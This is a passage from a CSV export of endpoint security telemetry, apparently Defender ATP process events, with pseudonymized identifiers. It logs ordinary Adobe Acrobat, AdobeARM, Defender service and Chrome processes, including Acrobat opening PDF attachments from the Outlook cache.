/prefetch:1",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:05.247406900+00:00,10312,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 01:22:02.166525300+00:00,18796,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:05.472650300+00:00,2021-06-23 01:23:34.565831900+00:00,1a8b19a9-1242-40c9-9264-fe0d8d1f74bd,computerpii_0a470890c60768167990033d701e7bd881398861,157916,False,10.7740.19041.1052,False,11540474045172384,,11540474045172386,2021-06-23 01:22:05.247406900+00:00,10312,2021-06-23 01:22:05.247406900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,10312,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 01:22:05.241226500+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+371,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:05.502849200+00:00,17152,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1900,10418406401943917537,7287286549748088126,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=4197784312248681205 --mojo-platform-channel-handle=2212 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:05.247406900+00:00,10312,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 01:22:02.166525300+00:00,18796,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:05.514958900+00:00,2021-06-23 01:23:34.565878400+00:00,621bedd9-bc31-4e06-99e0-be6c3635bb10,computerpii_0a470890c60768167990033d701e7bd881398861,157917,False,10.7740.19041.1052,False,11540474045172384,,11540474045172387,2021-06-23 01:22:05.247406900+00:00,10312,2021-06-23 01:22:05.247406900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,10312,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 01:22:05.241226500+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+372,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:05.579844100+00:00,11392,AcroCEF.exe,"""AcroCEF.exe"" --type=gpu-process --field-trial-handle=1900,10418406401943917537,7287286549748088126,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --lang=en-US --gpu-preferences=KAAAAAAAAADgACAgAQAAAAAAAAAAAGAAAAAAABAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --use-gl=swiftshader-webgl --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --service-request-channel-token=7874195000592276954 --mojo-platform-channel-handle=2108 --allow-no-sandbox-job --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:05.247406900+00:00,10312,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 01:22:02.166525300+00:00,18796,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:05.585030700+00:00,2021-06-23 01:23:34.565922500+00:00,0d40623f-9be6-482c-8de5-489fc7b3d324,computerpii_0a470890c60768167990033d701e7bd881398861,157918,False,10.7740.19041.1052,False,11540474045172384,,11540474045172388,2021-06-23 01:22:05.247406900+00:00,10312,2021-06-23 01:22:05.247406900+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,10312,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 01:22:05.241226500+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+373,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:07.065192700+00:00,4764,AcroCEF.exe,"""AcroCEF.exe"" --type=renderer --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --touch-events=enabled --field-trial-handle=1900,10418406401943917537,7287286549748088126,131072 --disable-features=NetworkService,VizDisplayCompositor --disable-gpu-compositing --lang=en-US --disable-pack-loading --log-file=""C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\FilePII_32faaecac742100f7753f0c1d0aa0add01b4046b.log"" --log-severity=disable --product-version=""AcrobatServices/21.5.20048 Chrome/Ipv4PII_d1b09f1987215a731ca836b99c07a53884670a01"" --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --service-request-channel-token=7880424051842061742 --renderer-client-id=6 --mojo-platform-channel-handle=1936 --allow-no-sandbox-job /prefetch:1",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe,7230688,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,8a0c12e4747a1cb3b83c9f7fd99cf8b5,8d1b6147566f16aabfeff006f7de6ff615d4b5dff8eb89cdf2da116dfa975716,6d46a1669acb5d6167270f83e89388f4379c5621,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:05.247406900+00:00,10312,AcroCEF.exe,"""AcroCEF.exe"" --backgroundcolor=16514043",False,2021-06-23 01:22:02.166525300+00:00,18796,Acrobat.exe,Low,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:07.164646700+00:00,2021-06-23 01:23:34.566324600+00:00,4cab4541-292e-47e0-8411-6877df03bf94,computerpii_0a470890c60768167990033d701e7bd881398861,157927,False,10.7740.19041.1052,False,11540474045172384,,11540474045172389,2021-06-23 01:22:05.247406900+00:00,10312,2021-06-23 01:22:05.247406900+00:00,AcroCEF.exe,10312,256,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\AcroCEF,7230688,2021-05-28 05:11:15+00:00,2021-05-28 05:58:58+00:00,2021-06-23 01:22:05.241226500+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,,,,,,,,Invalid,Unknown,Invalid,Unknown,,,,,,,,,,,,
+374,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:22:08.008971100+00:00,7192,SenseCncProxy.exe,4864,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:08.026792300+00:00,2021-06-23 01:23:34.566726200+00:00,29135220-c3ac-46df-963d-90de55836d27,computerpii_0a470890c60768167990033d701e7bd881398861,157936,True,10.7740.19041.1052,False,11540474045137006,,11540474045172390,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+375,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:09.720630200+00:00,18036,AdobeARM.exe,"""AdobeARM.exe"" /PRODUCT:Acrobat /VERSION:21.0 /MODE:3",PortableExecutable,2021-01-25 13:55:56+00:00,C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe,1557200,b8b96354dd88484208f17101f6704f7c,ad25d9f873a80f454ce2acbb75246463070e216c89b042ee87b9a6204dd146c0,68815c39f47a0b8f766d9191e7ac55d3199d1c96,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:02.166525300+00:00,18796,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_f6a98158746a5fdbbe076bfb040a7f1343dd8f7d.pdf""",False,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:09.774882100+00:00,2021-06-23 01:23:34.567214500+00:00,0fa4a9be-46d8-43ce-8f14-2ba2b9aca394,computerpii_0a470890c60768167990033d701e7bd881398861,157946,False,10.7740.19041.1052,False,11540474045172364,,11540474045172391,2021-06-23 01:22:02.166525300+00:00,18796,2021-06-23 01:22:02.166525300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,18796,2176,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-23 01:22:02.169530900+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,10.0,1.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,Adobe Inc.,Adobe Reader and Acrobat Manager,1.824.42.0176,AdobeARM.exe,AdobeARM.exe,Adobe Reader and Acrobat Manager
+376,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:16.582815500+00:00,3884,LogTransport2.exe,"""LogTransport2.exe"" 58F761C05F236BDC0A495FBA@AdobeID 1 0 NOVALUE NOVALUE",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\LogTransport2.exe,855264,5f478ee4a63932d1ed50a41c55a29e23,c7578c3d0f3a474bee2788cb8560fff57ddaecd1138b98e334ba92941c58a754,fdd8d08ae21a4edd569c31f098ad75aaacd783e2,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 01:22:02.166525300+00:00,18796,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_f6a98158746a5fdbbe076bfb040a7f1343dd8f7d.pdf""",False,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:16.688377700+00:00,2021-06-23 01:23:34.568094900+00:00,e71f9a62-9f25-4d6e-b62c-5ca033821a3c,computerpii_0a470890c60768167990033d701e7bd881398861,157964,False,10.7740.19041.1052,False,11540474045172364,,11540474045172392,2021-06-23 01:22:02.166525300+00:00,18796,2021-06-23 01:22:02.166525300+00:00,\Device\HarddiskVolume3\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,18796,128,ActiveProcessStartkey,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat,3796704,2021-05-28 05:30:12+00:00,2021-05-28 05:58:58+00:00,2021-06-23 01:22:02.169530900+00:00,2021-05-28 05:58:58+00:00,256,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,,,,0.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC ,Adobe Systems Incorporated, LogTransport Application,8.2.0.14,LogTransport2,LogTransport2.exe,LogTransport Application
+377,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 01:22:19.362041700+00:00,5684,Acrobat.exe,"""Acrobat.exe"" ""C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UWEMRD7K\FilePII_f7cb604f766e93a9393ab91047022e32e49197c5.pdf""",PortableExecutable,2021-05-28 05:58:58+00:00,C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe,3796704,ac7d72262c5389c8cbe58cdddd2083a3,9d84b01f481959d4c8c335af7c1473ba831b698387441a05713527f1dbb517d2,6daf3b0133be331cf2e41a8f4180f01653b91845,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:22:19.493340200+00:00,2021-06-23 01:23:34.569211100+00:00,e1bdd87b-04d6-4618-9563-9b16e5ce4fba,computerpii_0a470890c60768167990033d701e7bd881398861,157989,False,10.7740.19041.1052,False,11540474045171845,,11540474045172397,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,OUTLOOK.EXE,16176,256,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,,,,,,,,Valid,OsVendor,Invalid,Unknown,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Adobe Systems Incorporated,Adobe Acrobat DC,21.5.20048.436468,,Acrobat.exe,Adobe Acrobat DC
+378,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:59:33.527050900+00:00,12500,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8556 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 02:59:33.539924100+00:00,2021-06-23 03:01:46.748527600+00:00,eee37a68-6fb5-4bb2-95d4-9bd526862793,computerpii_0a470890c60768167990033d701e7bd881398861,160236,False,10.7740.19041.1052,False,11540474045171838,,11540474045172879,2021-06-23 00:51:42.915074600+00:00,11880,2021-06-23 00:51:42.915074600+00:00,\Device\HarddiskVolume3\Program Files\Google\Chrome\Application\chrome.exe,11880,128,ActiveProcessStartkey,C:\Program Files\Google\Chrome\Application,2438312,2021-06-11 00:10:25+00:00,2021-06-11 01:45:55.958347+00:00,2021-06-23 00:51:43.090625600+00:00,2020-11-11 01:44:09.128437300+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,,384.0,,,,,,,Invalid,Unknown,Invalid,Unknown,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome,Google LLC,Google Chrome,91.0.4472.106,chrome_exe,chrome.exe,Google Chrome
+379,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 02:59:34.049709500+00:00,18108,chrome.exe,"""chrome.exe"" --type=renderer --field-trial-handle=1732,11555426520389665454,4002175263595542303,131072 --lang=en-US --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1.25 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8368 /prefetch:1",PortableExecutable,2020-11-11 01:44:09.128437300+00:00,C:\Program Files\Google\Chrome\Application\chrome.exe,2438312,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,8ac870b7e4a550c902e83db69184650f,9417611ee6fc2e697104026ceb4ba64a8af6d7ce4ba7b5c95af96e6c3300fbc6,dadb254e42330d6ee4166af6e234c1247b3cd3f4,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:42.915074600+00:00,11880,chrome.exe,"""chrome.exe"" ",False,2021-06-23 